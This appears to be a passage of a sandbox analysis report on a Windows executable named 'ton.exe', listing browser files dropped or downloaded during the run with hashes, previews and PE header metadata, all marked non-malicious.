                                                                                                                                                                                                                                                                                                    SHA-256:D5CEB4449384CD2D7898C052B7B99417961880945FC4EAE80EBBAF8E24CC0A3E
                                                                                                                                                                                                                                                                                                    SHA-512:025F7103D1F7D607825BE916D0131C1E04B295EB562974A77F5A16E7BF40250B5608071779B420E4738F86F09A6F7C889469FA898268894FFFEEB7465C589E81
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):291
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                    MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                    SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                    SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                    SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3782)
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):107677
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.396220758526552
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:1536:7nwyvB1qCo7mWUgsUopF5Xy4FlAwxdhvHcrdncqAKxwjBnKwIDQgrOChkPIgmrCp:wh6gstXy4FM5ncJKxCnKWgrd0v
                                                                                                                                                                                                                                                                                                    MD5:E8015AC436B33034EDF7DA060E853A04
                                                                                                                                                                                                                                                                                                    SHA1:62D0F6EB0E441158A1F56F6E0C70D3D229B57886
                                                                                                                                                                                                                                                                                                    SHA-256:23C953E989FF4AF6126D4A3B2AD21B33A82512FC8768045C00F05940DE2C9978
                                                                                                                                                                                                                                                                                                    SHA-512:C35AC8692FC22B78365CA202E173A90AE4B5DBA338B7FC9EEB17EDDF5868B52CF1D13DC0EDAF36BE1CC0E0152F41AC4027C51D7ECA27778B483E3FC83F11EA82
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function k(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):138356
                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                                                                    MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                                                                    SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                                                                    SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                                                                    SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):11185
                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                    MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                    SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                    SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                    SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1753
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                    MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                    SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                    SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                    SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):9815
                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                    MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                    SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                    SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                    SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):10388
                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                    MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                    SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                    SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                    SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):962
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                    MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                    SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                    SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                    SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2986)
                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                    Size (bytes):2991
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.832051088776781
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:48:8lm5FaKlgZ01RFiJqIbx6666VuqcCuLRfU3y2ooVXMSR3CQytWQqYOZMRtuSEqHg:8lWFJliroIN6666VDcCj3YoFMSR3xyAF
                                                                                                                                                                                                                                                                                                    MD5:E82035766AA789AA9510EFC9872FFA54
                                                                                                                                                                                                                                                                                                    SHA1:CB86171B7A2476FAFDC5B83CD2BDEC623650B5DE
                                                                                                                                                                                                                                                                                                    SHA-256:390738E3E772A957335B6D90C14C9C4B83D973A2F77A0354C1DCA6AB468EBADD
                                                                                                                                                                                                                                                                                                    SHA-512:A6E08171D1C47C107EBA531567A8B024F308522D48C0E80809B0944F8F4EFC67406A68F68098710B3CA23ECCF6EDE052C6A013C1A94CBA25A062730E1814CAE5
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                                    Preview:)]}'.["",["steve valiquette","zodiac signs daily horoscope today","montana millionaire lottery","indiana jones xbox game pass","asteroid hitting earth","nyt connections hints december 3","nj drones fbi","mortgage rates today"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"google:entityinfo":"CgovbS8wMnBoeHZmEhpDYW5hZGlhbiBpY2UgaG9ja2V5IHBsYXllcjLjC2RhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBRUFBUUFNQklnQUNFUUVERVFIL3hBQWJBQUFDQXdFQkFRQUFBQUFBQUFBQUFBQUVCUUlEQmdFSEFQL0VBREFRQUFJQkF3TUNCQVVDQndBQUFBQUFBQUVDQXdBRUVRVVNJVUZoQmhNeGNTTXlVWUd4RkNJVk0wSlNrZEh3LzhRQUdBRUJBQU1CQUFBQUFBQUFBQUFBQUFBQUJRSURCQUgveEF
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                    Size (bytes):29
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                                    MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                                    SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                                    SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                                    SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                                    Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                    Size (bytes):134268
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.441514867438808
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3072:fakX3ioI5wrfFiC8jMbk/5xnRupvsMTwR2i6o:fd3dDFqr/5xnRupvrwR8o
                                                                                                                                                                                                                                                                                                    MD5:CE414C00A7D2BDD8FD38B3819F24BB7B
                                                                                                                                                                                                                                                                                                    SHA1:4673B13410DF3B1B40DEB07371D8227355A675C0
                                                                                                                                                                                                                                                                                                    SHA-256:FE06BE986EBE51F69EB95D624A100E8D4605A2D5A181C4DFDC444511D19470DC
                                                                                                                                                                                                                                                                                                    SHA-512:12BAC81284DC0CACACF05B5327E0F6D1EC20EA8D5145BE3787F7B9475C16418F4FBA50F784DC27FF7BD2F507ECE6626C654020EF6E318980C9F4B0B7C3355E1E
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                                    Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                                                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.985514663858347
                                                                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                    File name:ton.exe
                                                                                                                                                                                                                                                                                                    File size:1'171'693 bytes
                                                                                                                                                                                                                                                                                                    MD5:1ae543f386c7215e1c40f24c93179f77
                                                                                                                                                                                                                                                                                                    SHA1:72e2c7c2303137507d1f320ecc506333487ae0d9
                                                                                                                                                                                                                                                                                                    SHA256:17769137dcd00c16e0310c531df0e2f2281bae750da28d435b991c688e1a2ba2
                                                                                                                                                                                                                                                                                                    SHA512:bbf37bf85087d434388dd881b0b53791e45fd0aed84771c6d216bfe87d37286ab6d1c18e2b9e6dc83ae45abc66e77f38e19e836584470bba6512016f398e23b1
                                                                                                                                                                                                                                                                                                    SSDEEP:24576:jwopVaMUByYnuN+i7TcLcyarnz6nlBAkjqtVFUXRRUwAoP6RV:zVObuN+YTcvIzSjAkjqgUJ
                                                                                                                                                                                                                                                                                                    TLSH:CE4523CFEFD49D5AEE9B0FF662B1A9178113F4818B10A7976600CE8C6B90B05DF54362
                                                                                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
                                                                                                                                                                                                                                                                                                    Icon Hash:c606e4d4d0d8e172
                                                                                                                                                                                                                                                                                                    Entrypoint:0x4038af
                                                                                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                    Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                                                                                    File Version Major:5
